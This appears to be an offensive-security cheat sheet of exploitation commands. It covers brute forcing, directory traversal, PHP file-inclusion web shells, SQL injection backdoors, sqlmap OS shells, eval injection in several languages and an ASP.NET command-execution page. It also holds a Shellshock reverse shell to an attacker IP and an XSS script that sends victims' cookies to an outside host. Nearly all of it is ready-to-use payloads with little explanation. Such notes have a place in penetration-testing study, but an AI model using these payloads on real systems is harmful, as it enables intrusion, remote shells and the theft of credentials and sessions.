Skip to content

Exploitation

Credentials

Create Passwd Directory for Brute Force

cewl -m 5 http://$ip/joomla/ > passwd.txt

Default Credentials

ls /usr/share/seclists/Passwords/Default-Credentials

Crack hash

john hash --wordlist=/home/kali/tools/directory/rockyou.txt

Broute force

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 192.168.169.106 --http-post-form '/login:user=^USER^,pass=^PASS^:Unauthorized'

Directory Traversal

Unix

/etc/passwd

Windows

c:\windows\system32\drivers\etc\hosts

PHP Wrappers

Inject php code via plantext

http://ip/file.php?file=data:text/plain,<?php echo shell_exec("dir") ?>

Inject php code via base64

http://ip/file.php?file=data:;base64,PD9zeXN0ZW0oJF9HRVRbJ3gnXSk7Pz4=&x=dir

Encode base64 file before read it.

http://ip/file.php?file=php://filter/read=convert.base64-encode/resource=/etc/passwd

File Inclusion

Local File Inclusion

Null byte: %00

Write payload to access.log file

$ nc -nv 192.168.11.131 80
(UNKNOWN) [192.168.11.131] 80 (http) open
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>

Get RCE via file inclusion

curl http://192.168.11.131/file.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig

Remote File Inclusion

<?php echo shell_exec($_GET['cmd']); ?>
curl http://target/?page=http://$ip/backdoor.txt&cmd=id

SQL Injection

Authentication Bypass

admin' or 1=1 LIMIT 1;#

Enumerating the Database

order by 3
union all select 1, 2, 3
union all select 1, @@version, 3
union all select 1, table_name from information_schema.tables, 3
union all select 1, column_name from information_schema.columns where table_name='users', 3
union all select 1, username, password from users

SQLi to Code Execution

Read file

union all select 1, load_file('C:/Windows/System32/drivers/etc/hosts'), 3

Write backdoor

union all select 1, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php', 3
priority=Normal' UNION SELECT ('<?php echo exec($_GET["c"]);') INTO OUTFILE '/srv/http/c.php'; -- -

Automating SQL Injection

sqlmap

  1. B: Boolean-based blind
  2. E: Error-based
  3. U: Union query-based
  4. S: Stacked queries
  5. T: Time-based blind
  6. Q: Inline queries
sqlmap -u http://$ip/debug.php?id=1 -p "id"

dump databases

sqlmap -u http://$ip/debug.php?id=1 -p "id" --dbms=mysql --dump

execute a shell

sqlmap -u http://$ip/debug.php?id=1 -p "id" --dbms=mysql --os-shell

file post

sqlmap -r req --dbms mysql -p limit --level 3 --batch --technique=S --os-shell

Shellshock POC

curl -H "user-agent: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/$myip/445 0>&1'" http://$ip/cgi-bin/user.sh

Command Execution

;id
`id`
$(id)

Code Execution

Ruby

eval "\""+params['1']+"\""

?1="%2b`id`%2b"

Python

eval('"'+1+'"')

"%2bos.system('id')%2b"

"%2bos.popen('id').read()%2b"

"%2b__import__('os').popen('id').read()%2b"

"%2b__import__('os').popen(__import__('base64').b64decode('aWQ=')).read()%2b"

Perl

eval("return '".$FORM{1}."'");

/cgi-bin/form?1='.`id`.'

PHP

eval()

$s="echo \"".$_GET['1']."\";";

eval($s);

?1=".system('id')."

usort()

$1 = $_GET["1"];

usort(function('$a, $b', 'return strcmp($a->'.$1.',$b->'.$1.');'));

?1=id);}system('id');//

preg_replace()

preg_replace($_GET["1"], $_GET["2"], $_GET["3"]);

?1=/x/e&2=system('id')&3=x

assert()

assert(trim("'".$_GET['1']."'"));

echo htmlentities($_GET['1']);

?1=hacker'.system('id').'

site.master to RCE

<%@ Language="C#" src="site.master.cs" Inherits="MyNamespaceMaster.MyClassMaster" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
    <head runat="server">
        <title>Butch</title>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
        <meta name="application-name" content="Butch">
        <meta name="author" content="Butch">
        <meta name="description" content="Butch">
        <meta name="keywords" content="Butch">
        <link media="all" href="style.css" rel="stylesheet" type="text/css" />
        <link id="favicon" rel="shortcut icon" type="image/png" href="favicon.png" />
    </head>
    <body>
        <div id="wrap">
            <div id="header">Welcome to Butch Repository</div>
            <div id="main">
                <div id="content">
                    <br />
                    <asp:contentplaceholder id="ContentPlaceHolder1" runat="server"></asp:contentplaceholder>
                    <br />
                </div>
            </div>
        </div>
    </body>
</html>
<%
string stdout = "";
string cmd = "whoami";
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + cmd);
procStartInfo.RedirectStandardOutput = true;
procStartInfo.UseShellExecute = false;
procStartInfo.CreateNoWindow = true;
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo = procStartInfo;
p.Start();
stdout = p.StandardOutput.ReadToEnd();
Response.Write(stdout);
%>
</body>
</html>
nt authority\system

XSS Basic Exploit

Break code

< > ' " { } ;

Content Injection

<iframe src=http://ip/report height="0" width="0"></iframe>

Stealing Cookies and Session Information

<script>new Image().src="http://10.11.0.4/cool.jpg?output="+document.cookie;</script>